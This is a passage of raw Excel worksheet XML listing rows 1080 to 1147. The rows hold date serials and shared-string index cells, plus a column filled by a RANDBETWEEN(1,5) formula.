      <c r="B1080" t="s">
        <v>13</v>
      </c>
      <c r="C1080" t="s">
        <v>6</v>
      </c>
      <c r="D1080" t="s">
        <v>25</v>
      </c>
      <c r="E1080" t="s">
        <v>1184</v>
      </c>
      <c r="F1080">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1081" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1081" s="1">
        <v>43538.40115740741</v>
      </c>
      <c r="B1081" t="s">
        <v>19</v>
      </c>
      <c r="C1081" t="s">
        <v>124</v>
      </c>
      <c r="E1081" s="2" t="s">
        <v>1185</v>
      </c>
      <c r="F1081">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1082" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1082" s="1">
        <v>43538.398946759262</v>
      </c>
      <c r="B1082" t="s">
        <v>19</v>
      </c>
      <c r="C1082" t="s">
        <v>124</v>
      </c>
      <c r="E1082" s="2" t="s">
        <v>1185</v>
      </c>
      <c r="F1082">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1083" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1083" s="1">
        <v>43538.392442129632</v>
      </c>
      <c r="B1083" t="s">
        <v>5</v>
      </c>
      <c r="C1083" t="s">
        <v>10</v>
      </c>
      <c r="D1083" t="s">
        <v>494</v>
      </c>
      <c r="E1083" s="2" t="s">
        <v>1186</v>
      </c>
      <c r="F1083">
        <f t="shared" ca="1" si="16"/>
        <v>5</v>
      </c>
    </row>
    <row r="1084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1084" s="1">
        <v>43538.390289351853</v>
      </c>
      <c r="B1084" t="s">
        <v>5</v>
      </c>
      <c r="C1084" t="s">
        <v>6</v>
      </c>
      <c r="D1084" t="s">
        <v>25</v>
      </c>
      <c r="F1084">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1085" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1085" s="1">
        <v>43538.389988425923</v>
      </c>
      <c r="B1085" t="s">
        <v>19</v>
      </c>
      <c r="C1085" t="s">
        <v>10</v>
      </c>
      <c r="D1085" t="s">
        <v>178</v>
      </c>
      <c r="E1085" s="2" t="s">
        <v>1187</v>
      </c>
      <c r="F1085">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1086" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1086" s="1">
        <v>43538.349548611113</v>
      </c>
      <c r="B1086" t="s">
        <v>13</v>
      </c>
      <c r="C1086" t="s">
        <v>10</v>
      </c>
      <c r="D1086" t="s">
        <v>178</v>
      </c>
      <c r="E1086" t="s">
        <v>1188</v>
      </c>
      <c r="F1086">
        <f t="shared" ca="1" si="16"/>
        <v>4</v>
      </c>
    </row>
    <row r="1087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1087" s="1">
        <v>43538.339386574073</v>
      </c>
      <c r="B1087" t="s">
        <v>22</v>
      </c>
      <c r="C1087" t="s">
        <v>1189</v>
      </c>
      <c r="E1087" t="s">
        <v>1190</v>
      </c>
      <c r="F1087">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1088" s="1">
        <v>43538.31417824074</v>
      </c>
      <c r="B1088" t="s">
        <v>9</v>
      </c>
      <c r="C1088" t="s">
        <v>41</v>
      </c>
      <c r="F1088">
        <f t="shared" ca="1" si="16"/>
        <v>1</v>
      </c>
    </row>
    <row r="1089" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1089" s="1">
        <v>43538.307291666664</v>
      </c>
      <c r="B1089" t="s">
        <v>5</v>
      </c>
      <c r="C1089" t="s">
        <v>71</v>
      </c>
      <c r="E1089" s="2" t="s">
        <v>1191</v>
      </c>
      <c r="F1089">
        <f t="shared" ca="1" si="16"/>
        <v>3</v>
      </c>
    </row>
    <row r="1090" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1090" s="1">
        <v>43538.307233796295</v>
      </c>
      <c r="B1090" t="s">
        <v>19</v>
      </c>
      <c r="C1090" t="s">
        <v>48</v>
      </c>
      <c r="E1090" s="2" t="s">
        <v>1192</v>
      </c>
      <c r="F1090">
        <f t="shared" ref="F1090:F1153" ca="1" si="17">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="1091" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1091" s="1">
        <v>43538.297268518516</v>
      </c>
      <c r="B1091" t="s">
        <v>9</v>
      </c>
      <c r="C1091" t="s">
        <v>16</v>
      </c>
      <c r="E1091" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="F1091">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1092" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1092" s="1">
        <v>43538.296435185184</v>
      </c>
      <c r="B1092" t="s">
        <v>13</v>
      </c>
      <c r="C1092" t="s">
        <v>16</v>
      </c>
      <c r="E1092" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="F1092">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1093" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1093" s="1">
        <v>43538.295983796299</v>
      </c>
      <c r="B1093" t="s">
        <v>13</v>
      </c>
      <c r="C1093" t="s">
        <v>16</v>
      </c>
      <c r="E1093" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="F1093">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1094" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1094" s="1">
        <v>43538.25986111111</v>
      </c>
      <c r="B1094" t="s">
        <v>5</v>
      </c>
      <c r="C1094" t="s">
        <v>1194</v>
      </c>
      <c r="D1094" t="s">
        <v>290</v>
      </c>
      <c r="E1094" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1094">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1095" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1095" s="1">
        <v>43538.25984953704</v>
      </c>
      <c r="B1095" t="s">
        <v>5</v>
      </c>
      <c r="C1095" t="s">
        <v>776</v>
      </c>
      <c r="D1095" t="s">
        <v>41</v>
      </c>
      <c r="E1095" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1095">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1096" s="1">
        <v>43538.251840277779</v>
      </c>
      <c r="B1096" t="s">
        <v>19</v>
      </c>
      <c r="C1096" t="s">
        <v>41</v>
      </c>
      <c r="E1096" t="s">
        <v>1195</v>
      </c>
      <c r="F1096">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1097" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1097" s="1">
        <v>43538.251655092594</v>
      </c>
      <c r="B1097" t="s">
        <v>9</v>
      </c>
      <c r="C1097" t="s">
        <v>50</v>
      </c>
      <c r="E1097" s="2" t="s">
        <v>1196</v>
      </c>
      <c r="F1097">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1098" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1098" s="1">
        <v>43538.243530092594</v>
      </c>
      <c r="B1098" t="s">
        <v>19</v>
      </c>
      <c r="C1098" t="s">
        <v>318</v>
      </c>
      <c r="E1098" s="2" t="s">
        <v>1197</v>
      </c>
      <c r="F1098">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1099" s="1">
        <v>43538.232094907406</v>
      </c>
      <c r="B1099" t="s">
        <v>19</v>
      </c>
      <c r="C1099" t="s">
        <v>845</v>
      </c>
      <c r="E1099" t="s">
        <v>1198</v>
      </c>
      <c r="F1099">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1100" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A1100" s="1">
        <v>43538.15896990741</v>
      </c>
      <c r="B1100" t="s">
        <v>5</v>
      </c>
      <c r="C1100" t="s">
        <v>1199</v>
      </c>
      <c r="D1100" t="s">
        <v>112</v>
      </c>
      <c r="E1100" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="F1100">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1101" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1101" s="1">
        <v>43538.155277777776</v>
      </c>
      <c r="B1101" t="s">
        <v>5</v>
      </c>
      <c r="C1101" t="s">
        <v>71</v>
      </c>
      <c r="E1101" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="F1101">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1102" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A1102" s="1">
        <v>43538.086041666669</v>
      </c>
      <c r="B1102" t="s">
        <v>19</v>
      </c>
      <c r="C1102" t="s">
        <v>73</v>
      </c>
      <c r="E1102" s="2" t="s">
        <v>1202</v>
      </c>
      <c r="F1102">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1103" s="1">
        <v>43538.079386574071</v>
      </c>
      <c r="B1103" t="s">
        <v>35</v>
      </c>
      <c r="C1103" t="s">
        <v>10</v>
      </c>
      <c r="D1103" t="s">
        <v>33</v>
      </c>
      <c r="E1103" t="s">
        <v>1203</v>
      </c>
      <c r="F1103">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1104" s="1">
        <v>43538.055173611108</v>
      </c>
      <c r="B1104" t="s">
        <v>19</v>
      </c>
      <c r="C1104" t="s">
        <v>41</v>
      </c>
      <c r="E1104" t="s">
        <v>1204</v>
      </c>
      <c r="F1104">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1105" s="1">
        <v>43537.928449074076</v>
      </c>
      <c r="B1105" t="s">
        <v>13</v>
      </c>
      <c r="C1105" t="s">
        <v>73</v>
      </c>
      <c r="E1105" t="s">
        <v>1205</v>
      </c>
      <c r="F1105">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1106" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1106" s="1">
        <v>43537.903483796297</v>
      </c>
      <c r="B1106" t="s">
        <v>22</v>
      </c>
      <c r="C1106" t="s">
        <v>140</v>
      </c>
      <c r="D1106" t="s">
        <v>141</v>
      </c>
      <c r="E1106" s="2" t="s">
        <v>1206</v>
      </c>
      <c r="F1106">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1107" s="1">
        <v>43537.894444444442</v>
      </c>
      <c r="B1107" t="s">
        <v>19</v>
      </c>
      <c r="C1107" t="s">
        <v>10</v>
      </c>
      <c r="D1107" t="s">
        <v>11</v>
      </c>
      <c r="E1107" t="s">
        <v>1207</v>
      </c>
      <c r="F1107">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1108" s="1">
        <v>43537.888923611114</v>
      </c>
      <c r="B1108" t="s">
        <v>5</v>
      </c>
      <c r="C1108" t="s">
        <v>10</v>
      </c>
      <c r="D1108" t="s">
        <v>163</v>
      </c>
      <c r="E1108" t="s">
        <v>1208</v>
      </c>
      <c r="F1108">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1109" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1109" s="1">
        <v>43537.864918981482</v>
      </c>
      <c r="B1109" t="s">
        <v>5</v>
      </c>
      <c r="C1109" t="s">
        <v>1209</v>
      </c>
      <c r="D1109" t="s">
        <v>25</v>
      </c>
      <c r="E1109" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1109">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1110" s="1">
        <v>43537.835972222223</v>
      </c>
      <c r="B1110" t="s">
        <v>19</v>
      </c>
      <c r="C1110" t="s">
        <v>10</v>
      </c>
      <c r="D1110" t="s">
        <v>94</v>
      </c>
      <c r="E1110" t="s">
        <v>1210</v>
      </c>
      <c r="F1110">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1111" s="1">
        <v>43537.812939814816</v>
      </c>
      <c r="B1111" t="s">
        <v>19</v>
      </c>
      <c r="C1111" t="s">
        <v>10</v>
      </c>
      <c r="D1111" t="s">
        <v>6</v>
      </c>
      <c r="E1111" t="s">
        <v>1211</v>
      </c>
      <c r="F1111">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1112" s="1">
        <v>43537.788437499999</v>
      </c>
      <c r="B1112" t="s">
        <v>5</v>
      </c>
      <c r="C1112" t="s">
        <v>10</v>
      </c>
      <c r="D1112" t="s">
        <v>6</v>
      </c>
      <c r="E1112" t="s">
        <v>1212</v>
      </c>
      <c r="F1112">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1113" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1113" s="1">
        <v>43537.749050925922</v>
      </c>
      <c r="B1113" t="s">
        <v>5</v>
      </c>
      <c r="C1113" t="s">
        <v>6</v>
      </c>
      <c r="D1113" t="s">
        <v>25</v>
      </c>
      <c r="E1113" s="2" t="s">
        <v>1213</v>
      </c>
      <c r="F1113">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1114" s="1">
        <v>43537.738923611112</v>
      </c>
      <c r="B1114" t="s">
        <v>5</v>
      </c>
      <c r="C1114" t="s">
        <v>48</v>
      </c>
      <c r="D1114" t="s">
        <v>312</v>
      </c>
      <c r="E1114" t="s">
        <v>1214</v>
      </c>
      <c r="F1114">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1115" s="1">
        <v>43537.731979166667</v>
      </c>
      <c r="B1115" t="s">
        <v>5</v>
      </c>
      <c r="C1115" t="s">
        <v>10</v>
      </c>
      <c r="D1115" t="s">
        <v>89</v>
      </c>
      <c r="E1115" t="s">
        <v>1215</v>
      </c>
      <c r="F1115">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1116" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A1116" s="1">
        <v>43537.727083333331</v>
      </c>
      <c r="B1116" t="s">
        <v>19</v>
      </c>
      <c r="C1116" t="s">
        <v>6</v>
      </c>
      <c r="D1116" t="s">
        <v>821</v>
      </c>
      <c r="E1116" s="2" t="s">
        <v>1216</v>
      </c>
      <c r="F1116">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1117" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1117" s="1">
        <v>43537.680081018516</v>
      </c>
      <c r="B1117" t="s">
        <v>13</v>
      </c>
      <c r="C1117" t="s">
        <v>10</v>
      </c>
      <c r="D1117" t="s">
        <v>80</v>
      </c>
      <c r="E1117" s="2" t="s">
        <v>1217</v>
      </c>
      <c r="F1117">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1118" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1118" s="1">
        <v>43537.678020833337</v>
      </c>
      <c r="B1118" t="s">
        <v>5</v>
      </c>
      <c r="C1118" t="s">
        <v>477</v>
      </c>
      <c r="D1118" t="s">
        <v>92</v>
      </c>
      <c r="E1118" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1118">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1119" s="1">
        <v>43537.673946759256</v>
      </c>
      <c r="B1119" t="s">
        <v>19</v>
      </c>
      <c r="C1119" t="s">
        <v>10</v>
      </c>
      <c r="D1119" t="s">
        <v>1056</v>
      </c>
      <c r="E1119" t="s">
        <v>1218</v>
      </c>
      <c r="F1119">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1120" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1120" s="1">
        <v>43537.666990740741</v>
      </c>
      <c r="B1120" t="s">
        <v>5</v>
      </c>
      <c r="C1120" t="s">
        <v>907</v>
      </c>
      <c r="D1120" t="s">
        <v>330</v>
      </c>
      <c r="E1120" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1120">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1121" s="1">
        <v>43537.66375</v>
      </c>
      <c r="B1121" t="s">
        <v>19</v>
      </c>
      <c r="C1121" t="s">
        <v>10</v>
      </c>
      <c r="D1121" t="s">
        <v>163</v>
      </c>
      <c r="E1121" t="s">
        <v>1219</v>
      </c>
      <c r="F1121">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1122" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1122" s="1">
        <v>43537.661377314813</v>
      </c>
      <c r="B1122" t="s">
        <v>19</v>
      </c>
      <c r="C1122" t="s">
        <v>10</v>
      </c>
      <c r="D1122" t="s">
        <v>80</v>
      </c>
      <c r="E1122" s="2" t="s">
        <v>1220</v>
      </c>
      <c r="F1122">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1123" s="1">
        <v>43537.631342592591</v>
      </c>
      <c r="B1123" t="s">
        <v>19</v>
      </c>
      <c r="C1123" t="s">
        <v>10</v>
      </c>
      <c r="D1123" t="s">
        <v>271</v>
      </c>
      <c r="E1123" t="s">
        <v>1221</v>
      </c>
      <c r="F1123">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1124" s="1">
        <v>43537.621701388889</v>
      </c>
      <c r="B1124" t="s">
        <v>22</v>
      </c>
      <c r="C1124" t="s">
        <v>10</v>
      </c>
      <c r="D1124" t="s">
        <v>46</v>
      </c>
      <c r="E1124" t="s">
        <v>1222</v>
      </c>
      <c r="F1124">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1125" s="1">
        <v>43537.616770833331</v>
      </c>
      <c r="B1125" t="s">
        <v>19</v>
      </c>
      <c r="C1125" t="s">
        <v>107</v>
      </c>
      <c r="E1125" t="s">
        <v>1223</v>
      </c>
      <c r="F1125">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1126" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1126" s="1">
        <v>43537.602349537039</v>
      </c>
      <c r="B1126" t="s">
        <v>19</v>
      </c>
      <c r="C1126" t="s">
        <v>10</v>
      </c>
      <c r="D1126" t="s">
        <v>89</v>
      </c>
      <c r="E1126" s="2" t="s">
        <v>1224</v>
      </c>
      <c r="F1126">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1127" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1127" s="1">
        <v>43537.601689814815</v>
      </c>
      <c r="B1127" t="s">
        <v>5</v>
      </c>
      <c r="C1127" t="s">
        <v>14</v>
      </c>
      <c r="D1127" t="s">
        <v>993</v>
      </c>
      <c r="E1127" s="2" t="s">
        <v>709</v>
      </c>
      <c r="F1127">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1128" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1128" s="1">
        <v>43537.598877314813</v>
      </c>
      <c r="B1128" t="s">
        <v>19</v>
      </c>
      <c r="C1128" t="s">
        <v>10</v>
      </c>
      <c r="D1128" t="s">
        <v>192</v>
      </c>
      <c r="E1128" s="2" t="s">
        <v>1225</v>
      </c>
      <c r="F1128">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1129" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1129" s="1">
        <v>43537.586770833332</v>
      </c>
      <c r="B1129" t="s">
        <v>19</v>
      </c>
      <c r="C1129" t="s">
        <v>10</v>
      </c>
      <c r="D1129" t="s">
        <v>86</v>
      </c>
      <c r="E1129" s="2" t="s">
        <v>1226</v>
      </c>
      <c r="F1129">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1130" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1130" s="1">
        <v>43537.584004629629</v>
      </c>
      <c r="B1130" t="s">
        <v>13</v>
      </c>
      <c r="C1130" t="s">
        <v>41</v>
      </c>
      <c r="E1130" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="F1130">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1131" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A1131" s="1">
        <v>43537.55908564815</v>
      </c>
      <c r="B1131" t="s">
        <v>9</v>
      </c>
      <c r="C1131" t="s">
        <v>10</v>
      </c>
      <c r="D1131" t="s">
        <v>52</v>
      </c>
      <c r="E1131" s="2" t="s">
        <v>1228</v>
      </c>
      <c r="F1131">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1132" s="1">
        <v>43537.556145833332</v>
      </c>
      <c r="B1132" t="s">
        <v>13</v>
      </c>
      <c r="C1132" t="s">
        <v>10</v>
      </c>
      <c r="D1132" t="s">
        <v>80</v>
      </c>
      <c r="E1132" t="s">
        <v>1229</v>
      </c>
      <c r="F1132">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1133" s="1">
        <v>43537.55332175926</v>
      </c>
      <c r="B1133" t="s">
        <v>13</v>
      </c>
      <c r="C1133" t="s">
        <v>10</v>
      </c>
      <c r="D1133" t="s">
        <v>17</v>
      </c>
      <c r="E1133" t="s">
        <v>1230</v>
      </c>
      <c r="F1133">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1134" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1134" s="1">
        <v>43537.526180555556</v>
      </c>
      <c r="B1134" t="s">
        <v>19</v>
      </c>
      <c r="C1134" t="s">
        <v>10</v>
      </c>
      <c r="D1134" t="s">
        <v>17</v>
      </c>
      <c r="E1134" s="2" t="s">
        <v>1231</v>
      </c>
      <c r="F1134">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1135" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1135" s="1">
        <v>43537.526076388887</v>
      </c>
      <c r="B1135" t="s">
        <v>5</v>
      </c>
      <c r="C1135" t="s">
        <v>10</v>
      </c>
      <c r="D1135" t="s">
        <v>17</v>
      </c>
      <c r="E1135" s="2" t="s">
        <v>1232</v>
      </c>
      <c r="F1135">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1136" s="1">
        <v>43537.520914351851</v>
      </c>
      <c r="B1136" t="s">
        <v>5</v>
      </c>
      <c r="C1136" t="s">
        <v>10</v>
      </c>
      <c r="D1136" t="s">
        <v>39</v>
      </c>
      <c r="E1136" t="s">
        <v>1233</v>
      </c>
      <c r="F1136">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1137" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1137" s="1">
        <v>43537.49695601852</v>
      </c>
      <c r="B1137" t="s">
        <v>13</v>
      </c>
      <c r="C1137" t="s">
        <v>10</v>
      </c>
      <c r="D1137" t="s">
        <v>271</v>
      </c>
      <c r="E1137" s="2" t="s">
        <v>1234</v>
      </c>
      <c r="F1137">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1138" s="1">
        <v>43537.488425925927</v>
      </c>
      <c r="B1138" t="s">
        <v>22</v>
      </c>
      <c r="C1138" t="s">
        <v>48</v>
      </c>
      <c r="E1138" t="s">
        <v>1235</v>
      </c>
      <c r="F1138">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1139" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1139" s="1">
        <v>43537.476493055554</v>
      </c>
      <c r="B1139" t="s">
        <v>19</v>
      </c>
      <c r="C1139" t="s">
        <v>10</v>
      </c>
      <c r="D1139" t="s">
        <v>89</v>
      </c>
      <c r="E1139" s="2" t="s">
        <v>1236</v>
      </c>
      <c r="F1139">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1140" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1140" s="1">
        <v>43537.474351851852</v>
      </c>
      <c r="B1140" t="s">
        <v>13</v>
      </c>
      <c r="C1140" t="s">
        <v>107</v>
      </c>
      <c r="E1140" s="2" t="s">
        <v>1237</v>
      </c>
      <c r="F1140">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1141" s="1">
        <v>43537.469386574077</v>
      </c>
      <c r="B1141" t="s">
        <v>19</v>
      </c>
      <c r="C1141" t="s">
        <v>10</v>
      </c>
      <c r="D1141" t="s">
        <v>52</v>
      </c>
      <c r="E1141" t="s">
        <v>1238</v>
      </c>
      <c r="F1141">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
      </c>
    </row>
    <row r="1142" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1142" s="1">
        <v>43537.466828703706</v>
      </c>
      <c r="B1142" t="s">
        <v>5</v>
      </c>
      <c r="C1142" t="s">
        <v>71</v>
      </c>
      <c r="E1142" s="2" t="s">
        <v>1239</v>
      </c>
      <c r="F1142">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1143" s="1">
        <v>43537.465752314813</v>
      </c>
      <c r="B1143" t="s">
        <v>19</v>
      </c>
      <c r="C1143" t="s">
        <v>10</v>
      </c>
      <c r="D1143" t="s">
        <v>80</v>
      </c>
      <c r="E1143" t="s">
        <v>1240</v>
      </c>
      <c r="F1143">
        <f t="shared" ca="1" si="17"/>
        <v>3</v>
      </c>
    </row>
    <row r="1144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1144" s="1">
        <v>43537.464421296296</v>
      </c>
      <c r="B1144" t="s">
        <v>5</v>
      </c>
      <c r="C1144" t="s">
        <v>69</v>
      </c>
      <c r="E1144" t="s">
        <v>1241</v>
      </c>
      <c r="F1144">
        <f t="shared" ca="1" si="17"/>
        <v>4</v>
      </c>
    </row>
    <row r="1145" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A1145" s="1">
        <v>43537.455000000002</v>
      </c>
      <c r="B1145" t="s">
        <v>35</v>
      </c>
      <c r="C1145" t="s">
        <v>139</v>
      </c>
      <c r="E1145" s="2" t="s">
        <v>1242</v>
      </c>
      <c r="F1145">
        <f t="shared" ca="1" si="17"/>
        <v>2</v>
      </c>
    </row>
    <row r="1146" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1146" s="1">
        <v>43537.454502314817</v>
      </c>
      <c r="B1146" t="s">
        <v>5</v>
      </c>
      <c r="C1146" t="s">
        <v>10</v>
      </c>
      <c r="D1146" t="s">
        <v>80</v>
      </c>
      <c r="E1146" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="F1146">
        <f t="shared" ca="1" si="17"/>
        <v>1</v>
      </c>
    </row>
    <row r="1147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1147" s="1">
        <v>43537.453969907408</v>
      </c>
      <c r="B1147" t="s">
        <v>19</v>
      </c>
      <c r="C1147" t="s">
        <v>10</v>
      </c>
      <c r="D1147" t="s">
        <v>36</v>
      </c>
      <c r="E1147" t="s">
        <v>1244</v>
      </c>
      <c r="F1147">
        <f t="shared" ca="1" si="17"/>
        <v>5</v>
